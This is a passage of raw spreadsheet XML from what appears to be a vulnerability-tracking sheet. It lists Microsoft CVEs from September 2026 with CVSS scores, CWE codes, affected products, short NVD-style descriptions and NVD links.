t="inlineStr"><is><t>CVE-2026-70573</t></is></c><c r="D996" s="5" t="n"><v>7</v></c><c r="E996" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F996" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G996" s="5" t="inlineStr" /><c r="H996" s="5" t="n"><v>0.003</v></c><c r="I996" s="5" t="inlineStr" /><c r="J996" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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996" s="5" t="inlineStr" /><c r="M996" s="5" t="inlineStr" /><c r="N996" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O996" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P996" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q996" s="5" t="inlineStr" /><c r="R996" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S996" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T996" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70573</t></is></c></row><row r="997"><c r="A997" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B997" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C997" s="5" t="inlineStr"><is><t>CVE-2026-70577</t></is></c><c r="D997" s="5" t="n"><v>7</v></c><c r="E997" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F997" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G997" s="5" t="inlineStr" /><c r="H997" s="5" t="n"><v>0.003</v></c><c r="I997" s="5" t="inlineStr" /><c r="J997" s="5" t="inlineStr" /><c r="K997" s="5" t="inlineStr" /><c r="L997" s="5" t="inlineStr" /><c r="M997" s="5" t="inlineStr" /><c r="N997" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O997" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P997" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q997" s="5" t="inlineStr" /><c r="R997" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S997" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T997" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70577</t></is></c></row><row r="998"><c r="A998" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B998" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C998" s="5" t="inlineStr"><is><t>CVE-2026-70578</t></is></c><c r="D998" s="5" t="n"><v>7</v></c><c r="E998" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F998" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G998" s="5" t="inlineStr" /><c r="H998" s="5" t="n"><v>0.003</v></c><c r="I998" s="5" t="inlineStr" /><c r="J998" s="5" t="inlineStr" /><c r="K998" s="5" t="inlineStr" /><c r="L998" s="5" t="inlineStr" /><c r="M998" s="5" t="inlineStr" /><c r="N998" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O998" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P998" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q998" s="5" t="inlineStr" /><c r="R998" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S998" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T998" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70578</t></is></c></row><row r="999"><c r="A999" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B999" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C999" s="5" t="inlineStr"><is><t>CVE-2026-70585</t></is></c><c r="D999" s="5" t="n"><v>7</v></c><c r="E999" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F999" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G999" s="5" t="inlineStr" /><c r="H999" s="5" t="n"><v>0.003</v></c><c r="I999" s="5" t="inlineStr" /><c r="J999" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K999" s="5" t="inlineStr"><is><t>microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L999" s="5" t="inlineStr" /><c r="M999" s="5" t="inlineStr" /><c r="N999" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O999" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P999" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q999" s="5" t="inlineStr" /><c r="R999" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S999" s="5" t="inlineStr"><is><t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to execute code locally.</t></is></c><c r="T999" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70585</t></is></c></row><row r="1000"><c r="A1000" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1000" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1000" s="5" t="inlineStr"><is><t>CVE-2026-71332</t></is></c><c r="D1000" s="5" t="n"><v>7</v></c><c r="E1000" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1000" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1000" s="5" t="inlineStr" /><c r="H1000" s="5" t="n"><v>0.003</v></c><c r="I1000" s="5" t="inlineStr" /><c r="J1000" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K100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00" s="5" t="inlineStr" /><c r="M1000" s="5" t="inlineStr" /><c r="N1000" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1000" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1000" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1000" s="5" t="inlineStr" /><c r="R1000" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1000" s="5" t="inlineStr"><is><t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1000" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71332</t></is></c></row><row r="1001"><c r="A1001" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1001" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1001" s="5" t="inlineStr"><is><t>CVE-2026-71333</t></is></c><c r="D1001" s="5" t="n"><v>7</v></c><c r="E1001" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1001" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1001" s="5" t="inlineStr" /><c r="H1001" s="5" t="n"><v>0.003</v></c><c r="I1001" s="5" t="inlineStr" /><c r="J1001" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K100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01" s="5" t="inlineStr" /><c r="M1001" s="5" t="inlineStr" /><c r="N1001" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1001" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1001" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1001" s="5" t="inlineStr" /><c r="R1001" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1001" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1001" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71333</t></is></c></row><row r="1002"><c r="A1002" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1002" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1002" s="5" t="inlineStr"><is><t>CVE-2026-71340</t></is></c><c r="D1002" s="5" t="n"><v>7</v></c><c r="E1002" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1002" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1002" s="5" t="inlineStr" /><c r="H1002" s="5" t="n"><v>0.003</v></c><c r="I1002" s="5" t="inlineStr" /><c r="J1002" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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02" s="5" t="inlineStr" /><c r="M1002" s="5" t="inlineStr" /><c r="N1002" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1002" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1002" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1002" s="5" t="inlineStr" /><c r="R1002" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1002" s="5" t="inlineStr"><is><t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1002" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71340</t></is></c></row><row r="1003"><c r="A1003" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1003" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1003" s="5" t="inlineStr"><is><t>CVE-2026-71342</t></is></c><c r="D1003" s="5" t="n"><v>7</v></c><c r="E1003" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1003" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1003" s="5" t="inlineStr" /><c r="H1003" s="5" t="n"><v>0.002</v></c><c r="I1003" s="5" t="inlineStr" /><c r="J1003" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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03" s="5" t="inlineStr" /><c r="M1003" s="5" t="inlineStr" /><c r="N1003" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1003" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1003" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1003" s="5" t="inlineStr" /><c r="R1003" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1003" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1003" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71342</t></is></c></row><row r="1004"><c r="A1004" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1004" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1004" s="5" t="inlineStr"><is><t>CVE-2026-71351</t></is></c><c r="D1004" s="5" t="n"><v>7</v></c><c r="E1004" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1004" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1004" s="5" t="inlineStr" /><c r="H1004" s="5" t="n"><v>0.003</v></c><c r="I1004" s="5" t="inlineStr" /><c r="J1004" s="5" t="inlineStr" /><c r="K1004" s="5" t="inlineStr" /><c r="L1004" s="5" t="inlineStr" /><c r="M1004" s="5" t="inlineStr" /><c r="N1004" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1004" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1004" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1004" s="5" t="inlineStr" /><c r="R1004" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S1004" s="5" t="inlineStr"><is><t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1004" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71351</t></is></c></row><row r="1005"><c r="A1005" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1005" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1005" s="5" t="inlineStr"><is><t>CVE-2026-71353</t></is></c><c r="D1005" s="5" t="n"><v>7</v></c><c r="E1005" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1005" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1005" s="5" t="inlineStr" /><c r="H1005" s="5" t="n"><v>0.002</v></c><c r="I1005" s="5" t="inlineStr" /><c r="J1005" s="5" t="inlineStr" /><c r="K1005" s="5" t="inlineStr" /><c r="L1005" s="5" t="inlineStr" /><c r="M1005" s="5" t="inlineStr" /><c r="N1005" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1005" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1005" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1005" s="5" t="inlineStr" /><c r="R1005" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S1005" s="5" t="inlineStr"><is><t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1005" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71353</t></is></c></row><row r="1006"><c r="A1006" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1006" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1006" s="5" t="inlineStr"><is><t>CVE-2026-72926</t></is></c><c r="D1006" s="5" t="n"><v>7</v></c><c r="E1006" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1006" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1006" s="5" t="inlineStr" /><c r="H1006" s="5" t="n"><v>0.003</v></c><c r="I1006" s="5" t="inlineStr" /><c r="J1006" s="5" t="inlineStr" /><c r="K1006" s="5" t="inlineStr" /><c r="L1006" s="5" t="inlineStr" /><c r="M1006" s="5" t="inlineStr" /><c r="N1006" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1006" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1006" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1006" s="5" t="inlineStr" /><c r="R1006" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1006" s="5" t="inlineStr"><is><t>Use after free in Windows Internet Connection Sharing (ICS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1006" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72926</t></is></c></row><row r="1007"><c r="A1007" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1007" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1007" s="5" t="inlineStr"><is><t>CVE-2026-72930</t></is></c><c r="D1007" s="5" t="n"><v>7</v></c><c r="E1007" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1007" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1007" s="5" t="inlineStr" /><c r="H1007" s="5" t="n"><v>0.003</v></c><c r="I1007" s="5" t="inlineStr" /><c r="J1007" s="5" t="inlineStr" /><c r="K1007" s="5" t="inlineStr" /><c r="L1007" s="5" t="inlineStr" /><c r="M1007" s="5" t="inlineStr" /><c r="N1007" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1007" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1007" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1007" s="5" t="inlineStr" /><c r="R1007" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1007" s="5" t="inlineStr"><is><t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to execute code locally.</t></is></c><c r="T1007" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72930</t></is></c></row><row r="1008"><c r="A1008" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1008" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1008" s="5" t="inlineStr"><is><t>CVE-2026-72952</t></is></c><c r="D1008" s="5" t="n"><v>7</v></c><c r="E1008" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1008" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1008" s="5" t="inlineStr" /><c r="H1008" s="5" t="n"><v>0.003</v></c><c r="I1008" s="5" t="inlineStr" /><c r="J1008" s="5" t="inlineStr" /><c r="K1008" s="5" t="inlineStr" /><c r="L1008" s="5" t="inlineStr" /><c r="M1008" s="5" t="inlineStr" /><c r="N1008" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1008" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1008" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1008" s="5" t="inlineStr" /><c r="R1008" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1008" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t></is></c><c r="T1008" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72952</t></is></c></row><row r="1009"><c r="A1009" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1009" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1009" s="5" t="inlineStr"><is><t>CVE-2026-72963</t></is></c><c r="D1009" s="5" t="n"><v>7</v></c><c r="E1009" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1009" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1009" s="5" t="inlineStr" /><c r="H1009" s="5" t="n"><v>0.003</v></c><c r="I1009" s="5" t="inlineStr" /><c r="J1009" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1009"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09" s="5" t="inlineStr" /><c r="M1009" s="5" t="inlineStr" /><c r="N1009" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1009" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1009" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1009" s="5" t="inlineStr" /><c r="R1009" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1009" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Execution Server allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1009" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72963</t></is></c></row><row r="1010"><c r="A1010" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1010" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1010" s="5" t="inlineStr"><is><t>CVE-2026-73003</t></is></c><c r="D1010" s="5" t="n"><v>7</v></c><c r="E1010" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1010" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1010" s="5" t="inlineStr" /><c r="H1010" s="5" t="n"><v>0.002</v></c><c r="I1010" s="5" t="inlineStr" /><c r="J1010" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1010"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10" s="5" t="inlineStr" /><c r="M1010" s="5" t="inlineStr" /><c r="N1010" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1010" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1010" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1010" s="5" t="inlineStr" /><c r="R1010" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1010" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1010" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73003</t></is></c></row><row r="1011"><c r="A1011" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1011" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1011" s="5" t="inlineStr"><is><t>CVE-2026-73005</t></is></c><c r="D1011" s="5" t="n"><v>7</v></c><c r="E1011" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1011" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1011" s="5" t="inlineStr" /><c r="H1011" s="5" t="n"><v>0.002</v></c><c r="I1011" s="5" t="inlineStr" /><c r="J1011" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1011"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11" s="5" t="inlineStr" /><c r="M1011" s="5" t="inlineStr" /><c r="N1011" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1011" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1011" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1011" s="5" t="inlineStr" /><c r="R1011" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S1011" s="5" t="inlineStr"><is><t>Use after free in Windows Authentication Methods allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1011" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73005</t></is></c></row><row r="1012"><c r="A1012" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1012" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1012" s="5" t="inlineStr"><is><t>CVE-2026-73022</t></is></c><c r="D1012" s="5" t="n"><v>7</v></c><c r="E1012" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1012" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1012" s="5" t="inlineStr" /><c r="H1012" s="5" t="n"><v>0.002</v></c><c r="I1012" s="5" t="inlineStr" /><c r="J1012" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1012"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12" s="5" t="inlineStr" /><c r="M1012" s="5" t="inlineStr" /><c r="N1012" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1012" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1012" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1012" s="5" t="inlineStr" /><c r="R1012" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1012" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1012" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73022</t></is></c></row><row r="1013"><c r="A1013" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1013" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1013" s="5" t="inlineStr"><is><t>CVE-2026-77485</t></is></c><c r="D1013" s="5" t="n"><v>7</v></c><c r="E1013" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1013" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1013" s="5" t="inlineStr" /><c r="H1013" s="5" t="n"><v>0.002</v></c><c r="I1013" s="5" t="inlineStr" /><c r="J1013" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1013" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1013" s="5" t="inlineStr" /><c r="M1013" s="5" t="inlineStr" /><c r="N1013" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1013" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1013" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1013" s="5" t="inlineStr" /><c r="R1013" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1013" s="5" t="inlineStr"><is><t>Use after free in SQL Server allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1013" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77485</t></is></c></row><row r="1014"><c r="A1014" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1014" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1014" s="5" t="inlineStr"><is><t>CVE-2026-77894</t></is></c><c r="D1014" s="5" t="n"><v>7</v></c><c r="E1014" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1014" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1014" s="5" t="inlineStr" /><c r="H1014" s="5" t="n"><v>0.002</v></c><c r="I1014" s="5" t="inlineStr" /><c r="J1014" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K101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14" s="5" t="inlineStr" /><c r="M1014" s="5" t="inlineStr" /><c r="N1014" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1014" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1014" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1014" s="5" t="inlineStr" /><c r="R1014" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S1014" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1014" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77894</t></is></c></row><row r="1015"><c r="A1015" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1015" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1015" s="5" t="inlineStr"><is><t>CVE-2026-77897</t></is></c><c r="D1015" s="5" t="n"><v>7</v></c><c r="E1015" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1015" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1015" s="5" t="inlineStr" /><c r="H1015" s="5" t="n"><v>0.003</v></c><c r="I1015" s="5" t="inlineStr" /><c r="J1015" s="5" t="inlineStr" /><c r="K1015" s="5" t="inlineStr" /><c r="L1015" s="5" t="inlineStr" /><c r="M1015" s="5" t="inlineStr" /><c r="N1015" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1015" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1015" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1015" s="5" t="inlineStr" /><c r="R1015" s="5" t="inlineStr"><is><t>CWE-23</t></is></c><c r="S1015" s="5" t="inlineStr"><is><t>Relative path traversal in Power Automate allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1015" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77897</t></is></c></row><row r="1016"><c r="A1016" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1016" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1016" s="5" t="inlineStr"><is><t>CVE-2026-77899</t></is></c><c r="D1016" s="5" t="n"><v>7</v></c><c r="E1016" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1016" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1016" s="5" t="inlineStr" /><c r="H1016" s="5" t="n"><v>0.002</v></c><c r="I1016" s="5" t="inlineStr" /><c r="J1016" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1016" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2012</t></is></c><c r="L1016" s="5" t="inlineStr" /><c r="M1016" s="5" t="inlineStr" /><c r="N1016" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1016" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1016" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1016" s="5" t="inlineStr" /><c r="R1016" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1016" s="5" t="inlineStr"><is><t>Use after free in Windows Security Center allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1016" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77899</t></is></c></row><row r="1017"><c r="A1017" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1017" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1017" s="5" t="inlineStr"><is><t>CVE-2026-77905</t></is></c><c r="D1017" s="5" t="n"><v>7</v></c><c r="E1017" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1017" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1017" s="5" t="inlineStr" /><c r="H1017" s="5" t="n"><v>0.002</v></c><c r="I1017" s="5" t="inlineStr" /><c r="J1017" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K101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17" s="5" t="inlineStr" /><c r="M1017" s="5" t="inlineStr" /><c r="N1017" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1017" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1017" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1017" s="5" t="inlineStr" /><c r="R1017" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1017" s="5" t="inlineStr"><is><t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1017" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77905</t></is></c></row><row r="1018"><c r="A1018" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1018" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1018" s="5" t="inlineStr"><is><t>CVE-2026-78457</t></is></c><c r="D1018" s="5" t="n"><v>7</v></c><c r="E1018" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1018" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1018" s="5" t="inlineStr" /><c r="H1018" s="5" t="n"><v>0.002</v></c><c r="I1018" 